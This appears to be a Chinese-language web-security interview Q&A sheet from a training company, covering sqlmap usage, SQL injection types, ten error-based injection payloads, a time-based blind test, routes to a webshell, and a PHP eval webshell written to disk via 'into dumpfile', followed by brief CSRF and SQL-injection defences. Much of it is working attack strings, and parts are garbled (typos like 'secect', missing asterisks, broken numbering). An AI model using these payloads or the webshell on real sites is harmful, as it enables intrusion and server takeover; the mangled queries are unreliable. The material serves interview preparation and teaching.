1、sqlmap,怎么對(duì)一個(gè)注入點(diǎn)注入?
1)如果是 get 型號(hào),直接,sqlmap -u "諸如點(diǎn)網(wǎng)址".
2) 如果是 post 型諸如點(diǎn),可以 sqlmap -u "注入點(diǎn)網(wǎng)址” --data="post 的參數(shù)"
3)如果是 cookie,X-Forwarded-For 等,可以訪問的時(shí)候,用 burpsuite 抓包,注入處用號(hào)替換,放到文件里,然后 sqlmap -r "文件地址"
2、sql 注入的幾種類型?
1)報(bào)錯(cuò)注入
2)bool 型注入
3)延時(shí)注入
4)寬字節(jié)注入
3、報(bào)錯(cuò)注入的函數(shù)有哪些?10 個(gè)
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】2)通過 floor 報(bào)錯(cuò) 向下取整 3)
+and
updatexml(1, concat(0x7e,(secect @@version),0x7e),1)4).geometrycollection()select from
test
where id=1 and geometrycollection((select from(selectfrom(select
user())a)b));5).multipoint()select from test where id=1 and
multipoint((select from(select
from(select
user())a)b));6).polygon()select from test where
id=1 and polygon((select
from(select
from(select user())a)b));7).multipolygon()select from test where id=1 and
multipolygon((select from(select from(select user())a)b));8).linestring()select from test
where id=1 and linestring((select from(select
from(select
user())a)b));9).multilinestring()select from
test where id=1 and multilinestring((select
from(select from(select user())a)b));10).exp()select from test where id=1 and exp(~(select
* from(select user())a));
4、延時(shí)注入如何來判斷?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
5、如何拿一個(gè)網(wǎng)站的 webshell?
上傳,后臺(tái)編輯模板,sql 注入寫文件,命令執(zhí)行,代碼執(zhí)行, 一些已經(jīng)爆出的 cms 漏洞,比如 dedecms 后臺(tái)可以直接建立腳本文件,wordpress 上傳插件包含腳本文件 zip 壓縮包等
6、sql 注入寫文件都有哪些函數(shù)?
select '一句話' into
outfile '路徑'select '一句話' into dumpfile '路徑'select '
eval($_POST[1]) ?>'
into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
7、如何防止 CSRF?
1,驗(yàn)證 referer
2,驗(yàn)證 token
8、owasp 漏洞都有哪些?
1)SQL 注入防護(hù)方法:
2)失效的身份認(rèn)證和會(huì)話管理
3)跨站腳本攻擊 XSS
4)直接引用不安全的對(duì)象
5)安全配置錯(cuò)誤
6)敏感信息泄露
7)缺少功能級(jí)的訪問控制
8)跨站請(qǐng)求偽造 CSRF
9)使用含有已知漏洞的組件
9、未驗(yàn)證的重定向和轉(zhuǎn)發(fā)49、SQL 注入防護(hù)方法?
1)使用安全的 API
2)對(duì)輸入的特殊字符進(jìn)行 Escape 轉(zhuǎn)義處理
3)使用白名單來規(guī)范化輸入驗(yàn)證方法
4)對(duì)客戶端輸入進(jìn)行控制,不允許輸入 SQL 注入相關(guān)的特殊字符
5)服務(wù)器端在提交數(shù)據(jù)庫進(jìn)行 SQL 查詢之前,對(duì)特殊字符進(jìn)行過濾、轉(zhuǎn)義、替換、刪除。
更多關(guān)于網(wǎng)絡(luò)安全培訓(xùn)的問題,歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓(xùn)服務(wù)經(jīng)驗(yàn),采用全程面授高品質(zhì)、高體驗(yàn)培養(yǎng)模式,擁有國內(nèi)一體化教學(xué)管理及學(xué)員服務(wù),助力更多學(xué)員實(shí)現(xiàn)高薪夢(mèng)想。